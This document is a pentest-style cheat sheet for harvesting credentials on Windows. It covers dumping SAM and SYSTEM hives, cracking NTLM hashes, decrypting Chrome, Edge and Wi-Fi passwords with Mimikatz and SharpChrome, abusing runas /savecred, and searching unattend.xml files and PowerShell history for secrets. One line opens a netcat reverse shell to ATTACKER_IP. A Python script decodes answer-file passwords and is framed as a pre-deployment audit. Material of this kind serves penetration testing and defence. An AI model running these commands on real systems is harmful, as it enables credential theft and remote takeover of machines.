SAM / SYSTEM Dump

The SAM database holds the NTLM hashes of local accounts. Extracting them requires both the SYSTEM and SAM hives, because SYSTEM holds the boot key that decrypts the SAM entries.

Copy Registry Hives

reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM

Volume Shadow Copy (If Locked)

wmic shadowcopy call create Volume='C:\'
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\Temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM

Extract Hashes (Attacker)

impacket-secretsdump -sam SAM -system SYSTEM LOCAL
samdump2 SYSTEM SAM

Crack NTLM Hashes

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

DPAPI — Saved Passwords

DPAPI protects secrets such as Chrome/Edge saved passwords, Wi-Fi keys and RDP credentials.

Chrome/Edge Passwords

Encrypted DB location:
C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\%USERNAME%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Decrypt with Mimikatz

dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Decrypt with SharpChrome

SharpChrome.exe logins

Wi-Fi Passwords via DPAPI

netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear

Windows Vault / Credential Manager

List Stored Credentials

cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all

Exploit Saved Credentials (runas /savecred)

If cmdkey /list shows stored credentials:
runas /savecred /user:DOMAIN\admin cmd.exe
runas /savecred /user:Administrator "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"

Extract with Mimikatz

vault::cred /patch

Unattend.xml / Sysprep Files

Deployment files often contain plaintext or base64-encoded passwords.

Common Locations

dir /s /b C:\unattend.xml C:\Unattend.xml 2>nul
dir /s /b C:\sysprep.xml C:\sysprep.inf 2>nul
Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml,sysprep.inf,Unattended.xml -ErrorAction SilentlyContinue
Full list of paths:
C:\unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\Unattend\unattend.xml
C:\Windows\System32\sysprep\unattend.xml
C:\Windows\System32\sysprep\sysprep.xml
C:\Windows\System32\sysprep.inf

Password Format in Unattend.xml

<AutoLogon>
  <Password>
    <Value>UABhAHMAcwB3AG8AcgBkADEAMgAzAA==</Value>
    <PlainText>false</PlainText>
  </Password>
  <Username>Administrator</Username>
</AutoLogon>

Decode Base64 Password

The value is the UTF-16LE encoding of the password, base64-encoded, so base64 -d alone prints NUL-interleaved bytes; convert the output to UTF-8 (PowerShell's Unicode encoding already is UTF-16LE):
echo "UABhAHMAcwB3AG8AcgBkADEAMgAzAA==" | base64 -d | iconv -f UTF-16LE -t UTF-8
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("UABhAHMAcwB3AG8AcgBkADEAMgAzAA=="))
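An added audit script, not from this page, for checking a deployment image before it ships: it parses an answer file, reports every password element still present and decodes the base64/UTF-16LE values. It assumes the documented Windows Setup convention of appending "Password" (or "AdministratorPassword") to the password before encoding, which the page's sample value omits, so the decoder accepts both forms; the sample file and the S3cret! value are constructed.

```python
import base64
import xml.etree.ElementTree as ET

# Marker Windows Setup appends before UTF-16LE + base64 when <PlainText> is
# false (assumed format; the page's sample omits it, so both are accepted).
SUFFIXES = {"Password": "Password", "AdministratorPassword": "AdministratorPassword"}

def encode_unattend_value(password: str, element: str) -> str:
    """Build the <Value> string Setup expects for the given password element."""
    raw = (password + SUFFIXES[element]).encode("utf-16-le")
    return base64.b64encode(raw).decode("ascii")

def decode_unattend_value(value: str, element: str) -> str:
    """Reverse the encoding, dropping the marker suffix when it is present."""
    text = base64.b64decode(value).decode("utf-16-le")
    suffix = SUFFIXES[element]
    return text[:-len(suffix)] if text.endswith(suffix) else text

def find_credentials(xml_text: str) -> list:
    """Return (element, account, password) for every password left in the file."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    hits = []
    for node in root.iter():
        tag = node.tag.split("}")[-1]  # strip the unattend namespace
        if tag not in SUFFIXES:
            continue
        fields = {c.tag.split("}")[-1]: (c.text or "").strip() for c in node}
        if "Value" not in fields:
            continue
        # A missing <PlainText> is treated as plain text (script's assumption).
        plain = fields.get("PlainText", "true").lower() == "true"
        secret = fields["Value"] if plain else decode_unattend_value(fields["Value"], tag)
        account = next((c.text.strip() for c in parents.get(node, [])
                        if c.tag.split("}")[-1] in ("Username", "Name") and c.text), None)
        hits.append((tag, account, secret))
    return hits

# Constructed sample: the page's AutoLogon block plus an AdministratorPassword
# that uses the real suffix convention.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <AutoLogon>
    <Password><Value>UABhAHMAcwB3AG8AcgBkADEAMgAzAA==</Value><PlainText>false</PlainText></Password>
    <Username>Administrator</Username>
  </AutoLogon>
  <UserAccounts><AdministratorPassword>
    <Value>{encode_unattend_value('S3cret!', 'AdministratorPassword')}</Value><PlainText>false</PlainText>
  </AdministratorPassword></UserAccounts>
</unattend>"""
```

Run find_credentials over each file found under Common Locations; any hit means the image still carries a credential and should be scrubbed before deployment.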

PowerShell History

History File Location

(Get-PSReadlineOption).HistorySavePath
Default:
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Read History for All Users

Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Write-Output "=== $($_.FullName) ==="; Get-Content $_ }

Search for Credentials

Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Select-String -Path $_ -Pattern "password|credential|secret|key|token|pass" -AllMatches }

CMD History

cmd.exe keeps no persistent history file; doskey /history lists only the commands typed in the current console session.
doskey /history